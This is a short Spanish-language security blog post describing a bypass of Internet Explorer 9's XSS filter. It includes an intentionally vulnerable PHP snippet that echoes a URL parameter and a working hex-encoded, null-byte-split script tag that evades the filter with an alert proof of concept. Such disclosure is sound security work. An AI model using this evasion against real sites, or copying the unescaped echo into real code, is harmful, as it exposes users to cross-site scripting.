Bypass del filtro XSS de Internet Explorer 9

Recientemente se ha descubierto la forma de bypasear el filtro de Internet Explorer 9 que limita la acción de un Cross Site Scripting en el navegador de Microsoft.
Como sabéis IE9 te avisa de que ha modificado la página -si se tiene activada la funcionalidad- cuando detecta cierto patrón en un parámetro recibido en la url, por ejemplo, si tenemos el siguiente código vulnerable del lado del servidor:

<?php
echo $_GET['id'];
?>


Y recibimos la siguiente URL:

www.ejemplo.com/test.php?id=<script>alert("XSS");</script>

El navegador desplegará el siguiente mensaje:

Bypass filtro Internet Explorer
Mensaje mostrado por IE9

Sin embargo IE nos permite romper etiquetas insertando nullbytes entre los carácteres del siguiente modo <script>, aunque nos será imposible insertarlo directamente en la url, por lo que para solucionarlo deberemos convertir esta cadena a hexadecimal e insertarlo en un enlace, veamos unos ejemplos:

[NULL] =

No funciona: www.ejemplo.com/test.php?id=<s[NULL]cript>alert("XSS");</s[NULL]cript>

No funciona: <a href="www.ejemplo.com/test.php?id=<s[NULL]cript>alert("XSS");</s[NULL]cript>"</a>

Funciona: <a href="www.ejemplo.com/test.php?id=\x3C\x73\x00\x25\x30\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x22\x58
\x53\x53\x22\x29\x3B\x3C\x2F\x73\x00\x25\x30\x63\x72\x69\x70\x74\x3E"</a>


Si bien esto es una vulnerabilidad menor, los usuarios acostumbrados a que el navegador pare un ataque de este tipo pueden quedar expuestos ya que por el momento no existe forma de mitigar este fallo.



FUENTE: Security Focus

0 comentarios:

Publicar un comentario

ShellShock Labs es un blog dedicado a seguridad y hacking en general, un lugar donde buscamos que la gente participe con sus opiniones.

Síguenos




Posts Populares